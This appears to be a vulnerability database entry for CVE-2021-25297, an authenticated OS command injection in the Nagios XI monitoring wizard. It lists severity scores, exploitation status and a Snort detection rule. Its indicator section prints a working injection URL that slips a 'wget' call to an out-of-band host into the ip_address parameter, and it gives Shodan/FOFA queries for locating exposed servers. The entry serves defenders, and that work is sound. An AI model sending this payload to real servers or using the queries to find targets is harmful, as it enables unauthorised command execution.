cbcvebase.
CVE-2021-25297
published 2021-02-15

CVE-2021-25297: Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file…

PriorityP189high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-02-01
Exploited in the wild
EPSS
42.94%
98.6th percentile
Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios XI server.

Affected

1 ranges
VendorProductVersion rangeFixed in
nagiosnagios_xi5.5.6 – 5.7.5

Detection & IOCsextracted from sources · hover to see the quote

path/usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php
url/nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=3&wizard=switch&ip_address=127.0.0.1%22%3b%20wget%20{{interactsh-url}}%3b&snmpopts%5bsnmpcommunity%5d=public&scaninterfaces=on
path/nagiosxi/config/monitoringwizard.php
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Nagios XI OS Command Injection (CVE-2021-25297 & CVE-2021-25298)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"nagiosxi/config/monitoringwizard.php?"; fast_pattern; content:"ip_address="; content:"|3b|"; within:30; reference:cve,2021-25296; reference:cve,2021-25297; classtype:attempted-admin; sid:2034993; rev:1; metadata:attack_target Server, created_at 2022_01_27, cve CVE_2021_25296_CVE_2021_25297, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2022_01_27, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
  • Exploit traffic is a GET request to /nagiosxi/config/monitoringwizard.php with the 'ip_address' parameter containing a URL-encoded semicolon (%3b / 0x3b) used to inject OS commands after the IP address value.
  • The Nuclei template confirms exploitation by checking for an out-of-band DNS interaction (interactsh) AND the presence of 'Ping' and 'Switch Details' in the HTTP response body, with a 200 status code.
  • The wizard parameter is set to 'switch' and nextstep=3 in the injection request; defenders should alert on these specific query-string values combined with shell metacharacters in ip_address.
  • Shodan/FOFA queries can be used to identify exposed Nagios XI instances as potential targets: title:"Nagios XI", http.title:"nagios xi", title="nagios xi", app="nagios-xi".
  • Successful exploitation results in command execution as the 'apache' user on the Nagios XI server.
  • ·The vulnerability affects Nagios XI versions 5.5.6 through 5.7.5 only; versions outside this range are not affected by this specific injection path.
  • ·Exploitation requires valid Nagios XI credentials; this is an authenticated vulnerability, not unauthenticated.
  • ·The Metasploit module also covers CVE-2021-25296 (windowswmi wizard) and CVE-2021-25298 (cloud-vm wizard) via the same module; the Snort rule SID 2034993 covers both CVE-2021-25297 and CVE-2021-25298 together.

CVSS provenance

nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
vulncheck8.8HIGH
cisa8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.